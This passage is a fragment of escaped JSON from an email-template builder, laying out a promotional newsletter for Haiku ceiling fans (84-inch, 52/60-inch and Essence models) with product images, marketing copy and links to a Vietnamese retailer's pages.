containerPadding\\\":\\\"25px 30px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#a5a5a5\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%; text-align: left;\\\\\\\">You deserve a ceiling fan that adds to the beauty of your home and makes your life simpler. Handcrafted with premium materials and engineered with cutting-edge smart home technology, Haiku represents the pinnacle in style and innovation for ceiling fans. More than 75 international awards attest to its quality, while its world-leading efficiency makes it the perfect choice for energy-conscious homeowners.<\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"lE-11Qb1fk\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/haiku.hogiaphat.vn\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#c97a14\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_5\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">Read More Haiku Fans<\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":197,\\\"calculatedHeight\\\":37}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"bXYUs1ZZby\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"eo9KgENRVd\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZrgjmhET6A\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#b6b6b6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_2\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"GVMI7aUkHG\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677501625283-haiku-fans-residential.png\\\",\\\"width\\\":1000,\\\"height\\\":633},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Video gi\\u1edbi thi\\u1ec7u c\\u00f4ng ngh\\u1ec7 qu\\u1ea1t Haiku\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.youtube.com\\/watch?v=U00KePkHbJ8\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"WGBQKZKbhI\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"2px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#b6b6b6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_6\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_5\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"Qg-SXxpaDY\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"UXSjOILEvr\\\",\\\"contents\\\":[{\\\"id\\\":\\\"8dX0_u_8tj\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 7px 10px 10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122542378-h-1.jpg\\\",\\\"width\\\":300,\\\"height\\\":400,\\\"maxWidth\\\":\\\"80%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_2\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"60%\\\",\\\"autoWidth\\\":false}}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"skewsIpeLi\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontWeight\\\":700,\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_4\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><strong>Model: Haiku 84 inch - Moso Bambo Airfoils<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"AjovnzZ9dL\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#c97a14\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_5\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-84inch\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL3F1YXQtdHJhbi1oYWlrdS04NGluY2giLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><strong><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: Lato, sans-serif;\\\\\\\">R e a d\\u00a0 \\u00a0M o r e &gt;&gt;<\\/span><\\/strong><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"MfSqUJVgi_\\\",\\\"contents\\\":[{\\\"id\\\":\\\"AIbp_n7pPt\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122670015-h-2.jpg\\\",\\\"width\\\":300,\\\"height\\\":400,\\\"maxWidth\\\":\\\"75%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_3\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"60%\\\",\\\"autoWidth\\\":false}}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"bNQDqVjJ3i\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontWeight\\\":700,\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_8\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><strong>Model: Haiku 52\\/60 inch - Moso Bambo Airfoils<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"RdrbT5D-SZ\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#c97a14\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_9\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/quat-tran-haiku-h\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL3F1YXQtdHJhbi1oYWlrdS1oIiwidGFyZ2V0IjoiX2JsYW5rIn19\\\\\\\"><strong><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: Lato, sans-serif;\\\\\\\">R e a d\\u00a0 \\u00a0M o r e &gt;&gt;<\\/span><\\/strong><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}},{\\\"id\\\":\\\"luDxDjahZP\\\",\\\"contents\\\":[{\\\"id\\\":\\\"rVoAcsE_jW\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 10px 8px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122680334-h-3.jpg\\\",\\\"width\\\":300,\\\"height\\\":400,\\\"maxWidth\\\":\\\"80%\\\",\\\"autoWidth\\\":false},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"_override\\\":{\\\"mobile\\\":{\\\"src\\\":{\\\"maxWidth\\\":\\\"60%\\\",\\\"autoWidth\\\":false}}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"R1O7b90Czm\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontWeight\\\":700,\\\"color\\\":\\\"#727171\\\",\\\"textAlign\\\":\\\"left\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_6\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-family: inherit; line-height: 19.6px;\\\\\\\"><strong>Mode: Essence - Aluminium Airfoils<\\/strong><\\/span><\\/p>\\\",\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"o_IXrVt1wP\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 10px 30px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#c97a14\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/essence\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2Vzc2VuY2UiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><strong><span style=\\\\\\\"font-size: 14px; line-height: 19.6px; font-family: Lato, sans-serif;\\\\\\\">R e a d\\u00a0 \\u00a0M o r e &gt;&gt;<\\/span><\\/strong><\\/a><\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"GOL31FaRLf\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"hwbTiM3Utx\\\",\\\"contents\\\":[{\\\"id\\\":\\\"TVD-E1BXTh\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"25px 0px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/cdn.templates.unlayer.com\\/assets\\/1607002000922-vvb.png\\\",\\\"width\\\":600,\\\"height\\\":48},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_5\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_11\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"em1-YlvAoX\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_fkVaQ2PEN\\\",\\\"contents\\\":[{\\\"id\\\":\\\"wLx5W-qwDc\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677122312096-haiku-logo.png\\\",\\\"width\\\":718,\\\"height\\\":185},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"qZBv269hpu\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ffffff\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_10\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\">No fan manufacturer goes to greater lengths to create energy-efficient products than Big Ass Fans. It\\u2019s why businesses worldwide use our fans to cut heating and cooling costs by up to 30% and why designers rely on our ENERGY STAR\\u00ae-rated ceiling fan models to meet the growing demand for sustainable, LEED-certified projects.<\\/p>\\\",\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_10\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#cc7202\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_7\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"ilEcft3K21\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KQFvi5e5Kf\\\",\\\"contents\\\":[{\\\"id\\\":\\\"VqJpOx53SF\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"0px 0px 